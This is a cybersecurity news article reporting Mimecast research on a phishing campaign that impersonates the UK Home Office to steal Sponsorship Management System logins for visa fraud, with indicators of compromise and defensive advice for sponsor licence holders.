Home Office Phishing Scam Target UK Visa Sponsorship System
Fake Home Office emails target the UK Visa Sponsorship System, stealing logins to issue fraudulent visas and run costly immigration scams.
Scammers targeted unsuspecting companies with emails that looked like something straight from the Home Office, complete with urgent compliance warnings and account suspension threats.
According to cybersecurity firm Mimecast, those messages were anything but genuine. However, in reality, these messages were part of a sophisticated phishing campaign targeting UK organisations that hold sponsor licences, a direct attempt to steal logins for the government’s Sponsorship Management System (SMS).
The SMS is the secure portal that approved sponsors use to manage visa applications, so having those credentials in the wrong hands opens the door to serious abuse. Mimecast’s researchers found that attackers are sending emails to generic company inboxes, warning of alleged compliance issues.
According to Mimecast’s research compiled by Samantha Clarke, Hiwot Mendahun, Ankit Gupta and Mimecast Threat Research Team and shared with Hackread.com, the links in those emails lead to convincing copies of the official SMS login page, complete with government branding and even CAPTCHA gates to bypass basic security checks.
Once a victim enters their details, the credentials do not go to the government at all. Instead, they are sent to an attacker-controlled script. From there, the compromised accounts are used to issue fraudulent Certificates of Sponsorship.
In some cases, these are part of elaborate scams that create fake job offers, charging individuals between £15,000 and £20,000 for visa sponsorships that do not exist. The forged documents look authentic enough to pass early checks, making the fraud harder to detect until it is too late.
Technical analysis of the phishing pages shows they are almost identical to the real SMS portal, down to the HTML code and linked images. The only major difference is a small change in the login form’s action, pointing to the attacker’s server instead of the legitimate authentication process. It is a subtle modification that has huge consequences for victims.
Legal experts have warned that the fallout can be severe. Natasha Chell, Partner and Head of Risk and Compliance at Laura Devine Immigration, said some sponsors have already had their systems breached. She advised that organisations must protect their Home Office accounts through strong IT practices, regular training for key staff, and by verifying any suspicious requests directly with the Home Office before acting.
“We are aware of sponsors who have been targeted by these phishing scams and an unfortunate few who have had their systems breached. As gatekeepers of the sponsorship system, sponsors need to protect their Home Office online accounts by having robust IT practices, regular training for Key Personnel who have access to the accounts, and they should always contact the official Home Office channels to verify any suspicious requests.”
Natasha Chell – Laura Devine Immigration
Mimecast says it has already added detection rules to block these phishing emails for its customers, but the campaign continues to evolve. Indicators of compromise include subject lines such as “New Message in Your UKVI Account” or “System Notification – Action Required” and URLs mimicking official Home Office addresses with subtle alterations.
The advice for sponsor licence holders is that they must use multi-factor authentication for SMS access, change credentials regularly, monitor account activity for unusual logins, and train staff to spot suspicious messages.
Additionally, verification should always happen through official channels, never via a link in an unsolicited email. In this case, a little caution can prevent attackers from using your organisation as a stepping stone for large-scale immigration fraud.
HackRead
